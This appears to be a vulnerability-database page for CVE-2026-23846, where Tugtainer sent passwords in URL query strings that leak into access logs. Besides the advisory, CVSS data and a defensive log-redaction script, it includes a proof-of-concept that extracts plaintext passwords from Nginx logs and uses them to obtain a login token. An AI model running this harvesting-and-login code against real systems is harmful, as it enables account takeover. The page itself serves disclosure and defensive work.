Security Vulnerability Report
CVE-2026-23846 CVSS 8.1 HIGH

Published: 2026-01-19 20:15:49
Last Modified: 2026-02-05 18:44:55

Description

Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue.
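As an added defensive example (not part of the advisory or the Tugtainer project), the scrubber below redacts credential query parameters from Nginx combined-format access log lines and reports which lines carried credentials, so an operator can judge what stored logs have already exposed. The parameter names treated as secrets, the /api/login path and the log lines are all constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names treated as secrets (assumed set for this example).
SENSITIVE_PARAMS = {"password", "pwd", "pass", "token"}

# Quoted request line of a combined-format access log entry: "GET /path?q HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def redact_target(target):
    """Return (redacted request target, True if any sensitive parameter was present)."""
    parts = urlsplit(target)
    if not parts.query:
        return target, False
    found = False
    cleaned = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in SENSITIVE_PARAMS:
            found = True
            value = "REDACTED"
        cleaned.append((key, value))
    return urlunsplit(parts._replace(query=urlencode(cleaned))), found

def scrub_log(lines):
    """Redact every line; return (scrubbed lines, 1-based numbers of lines that carried credentials)."""
    scrubbed, leaked = [], []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            target, found = redact_target(m.group("target"))
            if found:
                leaked.append(n)
                line = line[:m.start("target")] + target + line[m.end("target"):]
        scrubbed.append(line)
    return scrubbed, leaked

# Constructed sample lines in Nginx combined format (not real log data).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jan/2026:20:15:49 +0000] "GET /api/login?username=admin&password=Hunter2 HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [19/Jan/2026:20:16:02 +0000] "POST /api/login HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [19/Jan/2026:20:16:30 +0000] "GET /api/containers?page=2 HTTP/1.1" 200 512 "-" "curl/8.0"',
]

if __name__ == "__main__":
    lines, leaked = scrub_log(SAMPLE_LOG)
    print("\n".join(lines))
    print("lines that carried credentials:", leaked)
```

Any line the scrubber flags is one where the password should already be treated as compromised; redaction protects the log going forward but does not undo the earlier exposure.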

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:quenary:tugtainer:*:*:*:*:*:docker:*:* - VULNERABLE
Tugtainer < 1.16.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-23846 PoC - detecting Tugtainer password leakage via URL query parameters
# An attacker recovers the leaked password by analysing access logs
import re
import requests

# Example: scan Nginx access logs for URLs that carry a password parameter
def analyze_nginx_logs(log_content):
    """Parse Nginx access logs and return every request whose URL contains a password."""
    # Nginx log format: client IP, then the quoted GET request line
    pattern = r'(\d+\.\d+\.\d+\.\d+) - .*?"GET /.*?(password|pwd|pass)=([^\s&]+)'
    matches = re.findall(pattern, log_content)
    leaked_credentials = []
    for match in matches:
        ip, param_name, password = match
        leaked_credentials.append({
            'source_ip': ip,
            'parameter': param_name,
            'password': password
        })
    return leaked_credentials

# Example: simulate an attacker logging in with the leaked credentials
def exploit_vulnerability(base_url, username, password):
    """Attempt to log in to Tugtainer with leaked credentials."""
    # Vulnerable behaviour: the password travels in the URL query string
    login_url = f"{base_url}/api/login?username={username}&password={password}"
    # The correct approach is a POST request with the credentials in the body:
    # login_url = f"{base_url}/api/login"
    # data = {'username': username, 'password': password}
    response = requests.get(login_url)
    if response.status_code == 200:
        token = response.json().get('token')
        print(f"[+] Leaked credentials accepted, token obtained: {token}")
        return token
    return None

# Correct login flow after the fix
def secure_login(base_url, username, password):
    """Secure login: the password is sent in the request body."""
    response = requests.post(
        f"{base_url}/api/login",
        json={'username': username, 'password': password}
    )
    return response.json() if response.status_code == 200 else None
```

References

https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52 (Patch)
https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23846", "sourceIdentifier": "[email protected]", "published": "2026-01-19T20:15:49.243", "lastModified": "2026-02-05T18:44:54.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue."}, {"lang": "es", "value": "Tugtainer es una aplicación autoalojada para automatizar actualizaciones de contenedores Docker. En versiones anteriores a la 1.16.1, el mecanismo de autenticación de contraseña transmite contraseñas a través de parámetros de consulta de URL en lugar del cuerpo de la solicitud HTTP. Esto provoca que las contraseñas se registren en los registros de acceso del servidor y se expongan potencialmente a través del historial del navegador, los encabezados Referer y los registros de proxy. La versión 1.16.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-598"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quenary:tugtainer:*:*:*:*:*:docker:*:*", "versionEndExcluding": "1.16.1", "matchCriteriaId": "B0EB5A8E-D461-4035-93D7-007BF202F58D"}]}]}], "references": [{"url": "https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```